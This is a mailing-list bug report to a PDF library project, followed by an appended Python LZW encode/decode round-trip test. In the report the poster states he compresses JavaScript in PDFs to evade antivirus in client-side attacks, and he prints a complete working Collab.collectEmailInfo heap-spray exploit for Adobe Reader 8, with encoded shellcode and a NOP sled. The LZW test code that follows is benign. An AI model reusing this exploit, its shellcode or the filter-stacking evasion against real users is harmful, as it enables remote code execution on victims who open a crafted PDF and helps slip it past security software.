
[pdf-devel] LZWEncode Bug Report


From: David Stroud
Subject: [pdf-devel] LZWEncode Bug Report
Date: Thu, 28 Jul 2011 13:40:19 +0100

Hey there,

After chatting with jemarch in the irc channel, I was advised to submit a bug report of this issue I've been having.

I'm trying to compress JavaScript inside PDFs for use in avoiding AVs in client-side attacks. To begin with I was just encoding this single line in pdf-filter:

app.alert({cMsg: 'Hello there', cTitle: 'Testing PDF JavaScript', nIcon: 3});

and it worked fine with lzw encoding, rle, ahex and flate (singularly or stacked together).

After that, I moved on to the actual exploit itself, which is the collectemailinfo heap spray. Here is the code with a payload that spawns calculator:

var MemArray = new Array();

function function1(var1, var2){
    while (var1.length * 2 < var2){
        var1 += var1;
    }
    var1 = var1.substring(0, var2 / 2);
    return var1;
}

function HeapSpray(input){
    var Sprayval = 0x0c0c0c0c;
    Shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065");
    if (input == 1){
        Sprayval = 0x30303030;
    }
    var const01 = 0x400000
    var ScLength = Shellcode.length * 2;
    var noplength = const01 - (ScLength + 0x38);
    var nop = unescape("%u9090%u9090");
    nop = function1(nop, noplength);
    var arraysize = (Sprayval - const01) / const01;
    for (var a = 0; a < arraysize; a ++){
        MemArray[a] = nop + Shellcode;
    }
}

function Sploit(){
    HeapSpray(0);
    var csled = unescape("%u0c0c%u0c0c");
    while (csled.length < 44952) csled += csled;
    this.collabStore = Collab.collectEmailInfo({subj : "", msg : csled});
}

Sploit();

The above code, when compressed with rle, flate and ahex (singularly or stacked), works with no problems (on Adobe Reader 8). However, as soon as I introduce lzw into it, either on its own or stacked with one or all the others, the exploit doesn't trigger. I tried the code without any whitespace as well, but no luck there either.

Hope this helps! Other than that it's been an amazing program so far =)

Cheers



--
David Stroud
Security Consultant
Perspective Risk
Email: address@hidden
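The symptom in the report (the same content survives RLE, Flate and ASCIIHex but comes out of LZWEncode unusable, and only once the input is longer than a single line) is what an encoder bug at a code-width or table-reset boundary looks like, because a short input never reaches those boundaries. The check a maintainer would want is a round-trip test against an independent reference: encode, decode with a second implementation, and compare byte for byte. The following is an added example written for this thread, not code from the GNU PDF library, pdf-filter, or the poster. It implements the PDF LZW filter semantics (PDF 32000-1 section 7.4.4: 9 to 12 bit codes packed MSB-first, ClearTable 256, EOD 257, EarlyChange) as a small encoder/decoder pair, round-trips a short and a constructed long input, and decodes an arbitrary filter output to report the first byte that differs from the original. The function names, the choice to emit ClearTable at entry 4094, and the sample inputs are my own assumptions.

```python
import random

CLEAR, EOD = 256, 257  # reserved codes of the PDF LZW filter
MAX_CODE = 4096        # codes are at most 12 bits wide
RESET_AT = 4094        # assumed point at which this encoder emits ClearTable


def pack(codes):
    """Pack (code, width) pairs MSB-first and zero-pad the final byte."""
    acc = nbits = 0
    for code, width in codes:
        acc, nbits = (acc << width) | code, nbits + width
    acc <<= (-nbits) % 8
    return acc.to_bytes((nbits + 7) // 8, "big")


def fresh_table():
    return [bytes([i]) for i in range(256)] + [b"", b""]  # 256/257 reserved


def lzw_encode(data, early_change=1):
    codes, table = [], {bytes([i]): i for i in range(256)}
    next_code, width, w = 258, 9, b""
    codes.append((CLEAR, width))
    for b in data:
        wc = w + bytes([b])
        if wc in table:
            w = wc
            continue
        codes.append((table[w], width))
        if next_code < RESET_AT:
            table[wc] = next_code
            next_code += 1
            # Width grows once entry next_code-1 exists; EarlyChange=1 grows one code early.
            if (next_code - 1) + early_change >= (1 << width) and width < 12:
                width += 1
        else:
            codes.append((CLEAR, width))  # table nearly full: reset both sides
            table = {bytes([i]): i for i in range(256)}
            next_code, width = 258, 9
        w = bytes([b])
    if w:
        codes.append((table[w], width))
    codes.append((EOD, width))
    return pack(codes)


def lzw_decode(data, early_change=1):
    bits, nbits, pos = int.from_bytes(data, "big"), 8 * len(data), 0
    table, width, prev, out = fresh_table(), 9, None, bytearray()
    while pos + width <= nbits:
        code = (bits >> (nbits - pos - width)) & ((1 << width) - 1)
        pos += width
        if code == EOD:
            break
        if code == CLEAR:
            table, width, prev = fresh_table(), 9, None
            continue
        if code < len(table):
            entry = table[code]
        elif code == len(table) and prev is not None:
            entry = prev + prev[:1]  # the KwKwK case: code not yet in the table
        else:
            raise ValueError("corrupt LZW stream near bit %d" % pos)
        out += entry
        if prev is not None and len(table) < MAX_CODE:
            table.append(prev + entry[:1])
            # The decoder lags the encoder by one entry, so test len(table) directly.
            if len(table) + early_change >= (1 << width) and width < 12:
                width += 1
        prev = entry
    return bytes(out)


def roundtrip_ok(data, early_change=1):
    return lzw_decode(lzw_encode(data, early_change), early_change) == data


def first_mismatch(encoded, expected, early_change=1):
    """Decode a filter's LZW output; return the first differing byte offset, or -1 if identical."""
    got = lzw_decode(encoded, early_change)
    for i, (a, b) in enumerate(zip(got, expected)):
        if a != b:
            return i
    return -1 if len(got) == len(expected) else min(len(got), len(expected))


# Constructed samples: the one-line script from the report, and a pseudo-random
# buffer long enough to cross the 10/11/12-bit boundaries and force a table reset.
SHORT = b"app.alert({cMsg: 'Hello there', cTitle: 'Testing PDF JavaScript', nIcon: 3});"
LONG = bytes(random.Random(7).getrandbits(8) for _ in range(12000))

if __name__ == "__main__":
    for name, sample in (("short", SHORT), ("long", LONG)):
        print(name, len(sample), "->", len(lzw_encode(sample)), "bytes; round-trip ok:",
              roundtrip_ok(sample), roundtrip_ok(sample, early_change=0))
```

To use this against pdf-filter, feed the suspect stream it produced to first_mismatch together with the original input: a return of -1 means the bytes match, any other value is the offset where the decoded output diverges, which is usually a few bytes after the point where the code width changed or the table was cleared. Decoding with the other EarlyChange value is the quickest way to tell an off-by-one in the width switch from a packing error.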

